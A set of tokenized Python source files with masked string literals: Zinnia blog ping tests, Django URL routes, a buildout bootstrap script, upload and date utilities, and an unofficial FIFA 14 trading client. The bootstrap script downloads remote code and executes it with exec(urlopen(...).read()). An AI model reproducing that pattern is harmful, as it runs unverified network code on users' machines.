) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> disconnect_entry_signals ( ) <EOL> params = { '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:content>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . entry = Entry . objects . create ( ** params ) <EOL> def test_ping_entry ( self ) : <EOL> pinger = NoThreadDirectoryPinger ( '<STR_LIT>' , [ self . entry ] , <EOL> start_now = False ) <EOL> self . assertEqual ( <EOL> pinger . ping_entry ( self . entry ) , <EOL> { '<STR_LIT:message>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } ) <EOL> self . assertEqual ( pinger . results , [ ] ) <EOL> def test_run ( self ) : <EOL> pinger = NoThreadDirectoryPinger ( '<STR_LIT>' , [ self . entry ] ) <EOL> self . assertEqual ( <EOL> pinger . results , <EOL> [ { '<STR_LIT>' : True , <EOL> '<STR_LIT:message>' : '<STR_LIT>' } ] ) <EOL> class ExternalUrlsPingerTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> disconnect_entry_signals ( ) <EOL> params = { '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:content>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . entry = Entry . objects . create ( ** params ) <EOL> def test_is_external_url ( self ) : <EOL> r = URLRessources ( ) <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , True ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , True ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , False ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' % r . site_url , r . site_url ) , False ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , r . site_url ) , True ) <EOL> self . assertEqual ( pinger . is_external_url ( <EOL> '<STR_LIT>' , r . site_url ) , False ) <EOL> def test_find_external_urls ( self ) : <EOL> r = URLRessources ( ) <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> external_urls = pinger . find_external_urls ( self . entry ) <EOL> self . assertEqual ( external_urls , [ ] ) <EOL> self . entry . content = """<STR_LIT>""" % r . site_url <EOL> self . entry . save ( ) <EOL> external_urls = pinger . find_external_urls ( self . entry ) <EOL> self . assertEqual ( external_urls , [ '<STR_LIT>' ] ) <EOL> def test_find_pingback_href ( self ) : <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> result = pinger . find_pingback_href ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , None ) <EOL> result = pinger . find_pingback_href ( """<STR_LIT>""" ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = pinger . find_pingback_href ( """<STR_LIT>""" ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = pinger . find_pingback_href ( """<STR_LIT>""" ) <EOL> self . assertEqual ( result , None ) <EOL> def fake_urlopen ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in url : <EOL> response = StringIO ( '<STR_LIT>' ) <EOL> return addinfourl ( response , { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:Content-Type>' : <EOL> '<STR_LIT>' } , url ) <EOL> elif '<STR_LIT:localhost>' in url : <EOL> response = StringIO ( <EOL> '<STR_LIT>' ) <EOL> return addinfourl ( response , { '<STR_LIT:Content-Type>' : <EOL> '<STR_LIT>' } , url ) <EOL> elif '<STR_LIT>' in url : <EOL> response = StringIO ( '<STR_LIT>' ) <EOL> return addinfourl ( response , { '<STR_LIT>' : '<STR_LIT>' } , url ) <EOL> elif '<STR_LIT:error>' in url : <EOL> raise URLError ( '<STR_LIT>' ) <EOL> def test_pingback_url ( self ) : <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> self . assertEqual ( <EOL> pinger . pingback_url ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def test_find_pingback_urls ( self ) : <EOL> import zinnia . ping <EOL> self . original_urlopen = zinnia . ping . urlopen <EOL> zinnia . ping . urlopen = self . fake_urlopen <EOL> pinger = ExternalUrlsPinger ( self . entry , start_now = False ) <EOL> urls = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . assertEqual ( <EOL> pinger . find_pingback_urls ( urls ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> zinnia . ping . urlopen = self . original_urlopen <EOL> def test_run ( self ) : <EOL> import zinnia . ping <EOL> self . original_urlopen = zinnia . ping . urlopen <EOL> zinnia . ping . urlopen = self . fake_urlopen <EOL> self . entry . content = """<STR_LIT>""" <EOL> pinger = NoThreadExternalUrlsPinger ( self . entry ) <EOL> self . assertEqual ( pinger . results , [ <EOL> '<STR_LIT>' ] ) <EOL> zinnia . ping . urlopen = self . original_urlopen </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls import url <EOL> from zinnia . urls import _ <EOL> from zinnia . views . tags import TagList <EOL> from zinnia . views . tags import TagDetail <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , <EOL> TagList . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> TagDetail . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( _ ( r'<STR_LIT>' ) , <EOL> TagDetail . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import shutil <EOL> import sys <EOL> import tempfile <EOL> from optparse import OptionParser <EOL> tmpeggs = tempfile . mkdtemp ( ) <EOL> usage = '''<STR_LIT>''' <EOL> parser = OptionParser ( usage = usage ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = '<STR_LIT>' , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" ) ) <EOL> options , args = parser . parse_args ( ) <EOL> to_reload = False <EOL> try : <EOL> import pkg_resources <EOL> import setuptools <EOL> except ImportError : <EOL> ez = { } <EOL> try : <EOL> from urllib . request import urlopen <EOL> except ImportError : <EOL> from urllib2 import urlopen <EOL> exec ( urlopen ( '<STR_LIT>' <EOL> ) . read ( ) , ez ) <EOL> setup_args = dict ( to_dir = tmpeggs , download_delay = <NUM_LIT:0> ) <EOL> ez [ '<STR_LIT>' ] ( ** setup_args ) <EOL> if to_reload : <EOL> reload ( pkg_resources ) <EOL> import pkg_resources <EOL> for path in sys . path : <EOL> if path not in pkg_resources . working_set . entries : <EOL> pkg_resources . working_set . add_entry ( path ) <EOL> ws = pkg_resources . working_set <EOL> cmd = [ sys . executable , '<STR_LIT:-c>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , tmpeggs ] <EOL> find_links = os . environ . get ( <EOL> '<STR_LIT>' , <EOL> options . find_links or <EOL> ( '<STR_LIT>' <EOL> if options . accept_buildout_test_releases else None ) <EOL> ) <EOL> if find_links : <EOL> cmd . extend ( [ '<STR_LIT>' , find_links ] ) <EOL> setuptools_path = ws . find ( <EOL> pkg_resources . Requirement . parse ( '<STR_LIT>' ) ) . location <EOL> requirement = '<STR_LIT>' <EOL> version = options . version <EOL> if version is None and not options . accept_buildout_test_releases : <EOL> import setuptools . package_index <EOL> _final_parts = '<STR_LIT>' , '<STR_LIT>' <EOL> def _final_version ( parsed_version ) : <EOL> for part in parsed_version : <EOL> if ( part [ : <NUM_LIT:1> ] == '<STR_LIT:*>' ) and ( part not in _final_parts ) : <EOL> return False <EOL> return True <EOL> index = setuptools . package_index . PackageIndex ( <EOL> search_path = [ setuptools_path ] ) <EOL> if find_links : <EOL> index . add_find_links ( ( find_links , ) ) <EOL> req = pkg_resources . Requirement . parse ( requirement ) <EOL> if index . obtain ( req ) is not None : <EOL> best = [ ] <EOL> bestv = None <EOL> for dist in index [ req . project_name ] : <EOL> distv = dist . parsed_version <EOL> if _final_version ( distv ) : <EOL> if bestv is None or distv > bestv : <EOL> best = [ dist ] <EOL> bestv = distv <EOL> elif distv == bestv : <EOL> best . append ( dist ) <EOL> if best : <EOL> best . sort ( ) <EOL> version = best [ - <NUM_LIT:1> ] . version <EOL> if version : <EOL> requirement = '<STR_LIT>' . join ( ( requirement , version ) ) <EOL> cmd . append ( requirement ) <EOL> import subprocess <EOL> if subprocess . call ( cmd , env = dict ( os . environ , PYTHONPATH = setuptools_path ) ) != <NUM_LIT:0> : <EOL> raise Exception ( <EOL> "<STR_LIT>" , <EOL> repr ( cmd ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> ws . add_entry ( tmpeggs ) <EOL> ws . require ( requirement ) <EOL> import zc . buildout . buildout <EOL> if not [ a for a in args if '<STR_LIT:=>' not in a ] : <EOL> args . append ( '<STR_LIT>' ) <EOL> if options . config_file is not None : <EOL> args [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ '<STR_LIT:-c>' , options . config_file ] <EOL> zc . buildout . buildout . main ( args ) <EOL> shutil . rmtree ( tmpeggs ) </s>
<s> import os <EOL> from functools import wraps <EOL> from StringIO import StringIO <EOL> import extensions as ext <EOL> from . models import Upload <EOL> def require_storage ( f ) : <EOL> @ wraps ( f ) <EOL> def wrapper ( * args , ** kw ) : <EOL> if not ext . storage : <EOL> ext . storage = ext . Storage ( ) <EOL> return f ( * args , ** kw ) <EOL> return wrapper <EOL> @ require_storage <EOL> def save_file ( name , data ) : <EOL> f = ext . storage . save ( name , data ) <EOL> name = f . name . decode ( '<STR_LIT:utf-8>' ) <EOL> url = f . url . decode ( '<STR_LIT:utf-8>' ) <EOL> ext . db . session . add ( Upload ( name = name , url = url ) ) <EOL> ext . db . session . commit ( ) <EOL> @ require_storage <EOL> def save_images ( name , data , images ) : <EOL> f = ext . storage . save ( name , data ) <EOL> name = f . name . decode ( '<STR_LIT:utf-8>' ) <EOL> url = f . url . decode ( '<STR_LIT:utf-8>' ) <EOL> upload = Upload ( name = name , url = url ) <EOL> for size , image in images . iteritems ( ) : <EOL> imageio = StringIO ( ) <EOL> image . save ( imageio , format = image . ext ) <EOL> f = ext . storage . save ( <EOL> '<STR_LIT>' % ( <EOL> os . path . splitext ( name ) [ <NUM_LIT:0> ] , <EOL> size , <EOL> image . ext <EOL> ) , <EOL> imageio <EOL> ) <EOL> setattr ( upload , u'<STR_LIT>' % size , f . name . decode ( '<STR_LIT:utf-8>' ) ) <EOL> setattr ( upload , u'<STR_LIT>' % size , f . url . decode ( '<STR_LIT:utf-8>' ) ) <EOL> ext . db . session . add ( upload ) <EOL> ext . db . session . commit ( ) <EOL> def save ( data , name = None ) : <EOL> if name is None : <EOL> name = data . filename <EOL> data = data . read ( ) <EOL> datafile = StringIO ( data ) <EOL> if ext . resizer : <EOL> try : <EOL> images = ext . resizer . resize_image ( datafile ) <EOL> except IOError : <EOL> return save_file ( name , data ) <EOL> save_images ( name , data , images ) <EOL> else : <EOL> return save_file ( name , data ) <EOL> @ require_storage <EOL> def delete ( upload ) : <EOL> ext . storage . delete ( upload . name ) <EOL> if ext . resizer : <EOL> for size in ext . resizer . sizes . iterkeys ( ) : <EOL> if getattr ( upload , size + '<STR_LIT>' ) : <EOL> ext . storage . delete ( getattr ( upload , size + '<STR_LIT>' ) ) <EOL> ext . db . session . delete ( upload ) <EOL> ext . db . session . commit ( ) </s>
<s> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] > <NUM_LIT:2> : <EOL> basestring = str <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> DATA = """<STR_LIT>""" <EOL> class NodeList ( list ) : <EOL> """<STR_LIT>""" <EOL> def find ( self , name ) : <EOL> for node in self : <EOL> if node == name : <EOL> return node <EOL> return None <EOL> def find_all ( self , name ) : <EOL> res = NodeList ( ) <EOL> for node in self : <EOL> if node == name : <EOL> res . append ( node ) <EOL> return res <EOL> def to_completion ( self ) : <EOL> return [ ( n . name + "<STR_LIT>" , n . name ) for n in self ] <EOL> COMPILED_NODES = NodeList ( ) <EOL> COMPILED_HEADS = NodeList ( ) <EOL> class ScopeNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , parent = None , children = None ) : <EOL> self . name = name <EOL> self . parent = parent <EOL> self . children = children or NodeList ( ) <EOL> self . level = parent and parent . level + <NUM_LIT:1> or <NUM_LIT:1> <EOL> def add_child ( self , child ) : <EOL> self . children . append ( child ) <EOL> def tree ( self ) : <EOL> if self . parent : <EOL> return self . name + '<STR_LIT:.>' + self . parent . tree ( ) <EOL> else : <EOL> return self . name <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , basestring ) : <EOL> return str ( self ) == other <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def __repr__ ( self ) : <EOL> ret = self . name <EOL> if self . children : <EOL> ret += "<STR_LIT>" % '<STR_LIT:U+0020>' . join ( repr ( child ) for child in self . children ) <EOL> return ret <EOL> lines = DATA . split ( "<STR_LIT:\n>" ) <EOL> indent = "<STR_LIT:U+0020>" * <NUM_LIT:4> <EOL> indent_level = <NUM_LIT:0> <EOL> indents = { } <EOL> for line in lines : <EOL> if line . isspace ( ) or not len ( line ) : <EOL> continue <EOL> if line . startswith ( indent * ( indent_level + <NUM_LIT:1> ) ) : <EOL> indent_level += <NUM_LIT:1> <EOL> if not line . startswith ( indent * indent_level ) : <EOL> for level in range ( indent_level - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> if line . startswith ( indent * level ) : <EOL> indent_level = level <EOL> break <EOL> parent = indents [ indent_level - <NUM_LIT:1> ] if indent_level - <NUM_LIT:1> in indents else None <EOL> node = ScopeNode ( line . strip ( ) , parent ) <EOL> indents [ indent_level ] = node <EOL> if parent : <EOL> parent . add_child ( node ) <EOL> else : <EOL> COMPILED_HEADS . append ( node ) <EOL> COMPILED_NODES . append ( node ) </s>
<s> from datetime import datetime , timedelta , tzinfo <EOL> import locale <EOL> import sys <EOL> import time <EOL> import pytz <EOL> from pytz . exceptions import UnknownTimeZoneError <EOL> ST2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> locale . setlocale ( locale . LC_TIME , '<STR_LIT>' ) <EOL> if not ST2 : <EOL> basestring = str <EOL> class LocalTimezone ( tzinfo ) : <EOL> """<STR_LIT>""" <EOL> STDOFFSET = timedelta ( seconds = - time . timezone ) <EOL> if time . daylight : <EOL> DSTOFFSET = timedelta ( seconds = - time . altzone ) <EOL> else : <EOL> DSTOFFSET = STDOFFSET <EOL> DSTDIFF = DSTOFFSET - STDOFFSET <EOL> def utcoffset ( self , dt ) : <EOL> if self . _isdst ( dt ) : <EOL> return self . DSTOFFSET <EOL> else : <EOL> return self . STDOFFSET <EOL> def dst ( self , dt ) : <EOL> if self . _isdst ( dt ) : <EOL> return self . DSTDIFF <EOL> else : <EOL> return timedelta ( <NUM_LIT:0> ) <EOL> def tzname ( self , dt ) : <EOL> return None <EOL> def _isdst ( self , dt ) : <EOL> tt = ( dt . year , dt . month , dt . day , <EOL> dt . hour , dt . minute , dt . second , <EOL> dt . weekday ( ) , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> stamp = time . mktime ( tt ) <EOL> tt = time . localtime ( stamp ) <EOL> return tt . tm_isdst > <NUM_LIT:0> <EOL> class FormatDate ( object ) : <EOL> """<STR_LIT>""" <EOL> local_tz = LocalTimezone ( ) <EOL> default = dict ( <EOL> format = "<STR_LIT>" , <EOL> tz_in = "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self , local_tz = None , default = None ) : <EOL> if local_tz : <EOL> if isinstance ( local_tz , tzinfo ) : <EOL> self . local_tz = local_tz <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if default is not None : <EOL> self . set_default ( default ) <EOL> def set_default ( self , update ) : <EOL> for k , v in update . items ( ) : <EOL> if k in self . default : <EOL> self . default [ k ] = v <EOL> def parse ( self , format = None , tz_in = None , tz_out = None ) : <EOL> if format == "<STR_LIT>" : <EOL> return str ( time . time ( ) ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> dt = self . date_gen ( tz_in , tz_out ) <EOL> text = self . date_format ( dt , format ) <EOL> if ST2 and isinstance ( text , str ) : <EOL> try : <EOL> text = text . decode ( locale . getpreferredencoding ( ) ) <EOL> except UnicodeDecodeError : <EOL> text = text . decode ( '<STR_LIT:utf-8>' ) <EOL> return text <EOL> def check_tzparam ( self , tz , name ) : <EOL> if isinstance ( tz , basestring ) : <EOL> try : <EOL> tz = str ( tz ) <EOL> return pytz . timezone ( tz ) <EOL> except UnknownTimeZoneError : <EOL> raise UnknownTimeZoneError ( "<STR_LIT>" <EOL> % ( name , tz ) ) <EOL> if tz is not None and not isinstance ( tz , tzinfo ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> % ( name , tz ) ) <EOL> return tz <EOL> def date_gen ( self , tz_in = None , tz_out = None ) : <EOL> """<STR_LIT>""" <EOL> if tz_in is None : <EOL> tz_in = self . default [ '<STR_LIT>' ] <EOL> if tz_in == "<STR_LIT>" : <EOL> tz_in = self . local_tz <EOL> tz_in = self . check_tzparam ( tz_in , '<STR_LIT>' ) <EOL> tz_out = self . check_tzparam ( tz_out , '<STR_LIT>' ) <EOL> try : <EOL> dt = tz_in . localize ( datetime . now ( ) ) <EOL> except AttributeError : <EOL> dt = datetime . now ( tz = tz_in ) <EOL> if not tz_out : <EOL> return dt <EOL> dt = dt . astimezone ( tz_out ) <EOL> try : <EOL> return tz_out . normalize ( dt ) <EOL> except AttributeError : <EOL> return dt <EOL> def date_format ( self , dt , format = None ) : <EOL> """<STR_LIT>""" <EOL> if format is None : <EOL> format = self . default [ '<STR_LIT>' ] <EOL> if format . startswith ( "<STR_LIT>" ) : <EOL> sep = '<STR_LIT:T>' <EOL> if len ( format ) == <NUM_LIT:5> and format [ <NUM_LIT:3> ] == '<STR_LIT::>' : <EOL> sep = str ( format [ - <NUM_LIT:1> ] ) <EOL> dt = dt . replace ( microsecond = <NUM_LIT:0> ) <EOL> return dt . isoformat ( sep ) <EOL> return dt . strftime ( format ) </s>
<s> from Fifa14Client import Card <EOL> import requests <EOL> from Fifa14Client . Exceptions import BadRequestException , FUTErrorCodeException <EOL> class WebAppFunctioner ( object ) : <EOL> """<STR_LIT>""" <EOL> COIN_URL = '<STR_LIT>' <EOL> TRANSFER_URL = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> BID_URL = '<STR_LIT>' <EOL> MOVE_URL = '<STR_LIT>' <EOL> UNASSIGNED_URL = '<STR_LIT>' <EOL> LIST_CARD_URL = '<STR_LIT>' <EOL> TRADEPILE_URL = '<STR_LIT>' <EOL> QUICKSELL_URL = '<STR_LIT>' <EOL> WATCHLIST_URL = '<STR_LIT>' <EOL> WATCHLIST_REMOVE_URL = '<STR_LIT>' <EOL> TRADEPILE_REMOVE_URL = '<STR_LIT>' <EOL> SQUAD_URL = '<STR_LIT>' <EOL> CLUB_URL = '<STR_LIT>' <EOL> ACCOUNT_URL = '<STR_LIT>' <EOL> LEADER_URL = '<STR_LIT>' <EOL> def __init__ ( self , login_manager ) : <EOL> self . login_manager = login_manager <EOL> if self . login_manager . ini_platform in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . platform_string = '<STR_LIT>' <EOL> else : <EOL> self . platform_string = '<STR_LIT>' <EOL> def get_headers ( self , http_method ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : self . login_manager . fut_web_phishing , <EOL> '<STR_LIT>' : self . login_manager . x_ut_sid , <EOL> '<STR_LIT>' : http_method } <EOL> def get_coin_amount ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . COIN_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except ValueError : <EOL> raise BadRequestException ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in json : <EOL> return json [ '<STR_LIT>' ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( '<STR_LIT>' , json ) <EOL> else : <EOL> raise BadRequestException ( '<STR_LIT>' ) <EOL> def search ( self , type = "<STR_LIT>" , lev = "<STR_LIT>" , pos = "<STR_LIT>" , num = <NUM_LIT:10> , team = "<STR_LIT>" , <EOL> macr = "<STR_LIT>" , micr = "<STR_LIT>" , minb = "<STR_LIT>" , nat = "<STR_LIT>" , maxb = "<STR_LIT>" , <EOL> playStyle = "<STR_LIT>" , leag = "<STR_LIT>" , start = <NUM_LIT:0> , cat = "<STR_LIT>" , <EOL> definitionId = "<STR_LIT>" , maskedDefId = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . TRANSFER_URL % ( self . platform_string , type , lev , pos , num , team , macr , micr , minb , nat , maxb , <EOL> playStyle , leag , start , cat , definitionId , maskedDefId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def bid ( self , card , price ) : <EOL> """<STR_LIT>""" <EOL> payload = '<STR_LIT>' % ( price ) <EOL> the_url = self . BID_URL % ( self . platform_string , card . tradeId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) , data = payload ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def move ( self , card , pile ) : <EOL> """<STR_LIT>""" <EOL> payload = '<STR_LIT>' % ( card . id , pile ) <EOL> r = requests . post ( self . MOVE_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT>' ) , data = payload ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" % pile ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" % pile , json ) <EOL> def get_unassigned_pile ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . UNASSIGNED_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def list_card ( self , card , starting_bid , buy_now_price = <NUM_LIT:0> , duration = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> payload = '<STR_LIT>' % ( buy_now_price , card . id , duration , starting_bid ) <EOL> r = requests . post ( self . LIST_CARD_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:POST>' ) , data = payload ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json [ '<STR_LIT:id>' ] <EOL> def get_tradepile ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . TRADEPILE_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def quicksell ( self , card ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . QUICKSELL_URL % ( self . platform_string , card . id ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def get_watchlist ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . WATCHLIST_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def remove_card_from_watchlist ( self , card ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . WATCHLIST_REMOVE_URL % ( self . platform_string , card . tradeId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> except : <EOL> pass <EOL> def remove_from_tradepile ( self , card ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . TRADEPILE_REMOVE_URL % ( self . platform_string , card . tradeId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> except : <EOL> pass <EOL> def get_squad ( self , squad_num ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . SQUAD_URL % ( self . platform_string , squad_num ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> def get_club ( self , count = "<STR_LIT>" , level = "<STR_LIT>" , type = "<STR_LIT>" , start = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . CLUB_URL % ( self . platform_string , count , level , type , start ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return [ Card . Card ( card ) for card in json [ '<STR_LIT>' ] ] <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> def get_user_id ( self ) : <EOL> '''<STR_LIT>''' <EOL> the_url = self . ACCOUNT_URL % self . platform_string <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> print FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json [ '<STR_LIT>' ] <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> def get_leaderboard_stats ( self , stat ) : <EOL> """<STR_LIT>""" <EOL> userId = self . get_user_id ( ) <EOL> the_url = self . LEADER_URL % ( self . platform_string , userId ) <EOL> print the_url <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> sIndex = { '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:3> } <EOL> try : <EOL> json = r . json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> print FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json [ '<STR_LIT>' ] [ sIndex [ stat ] ] [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) </s>
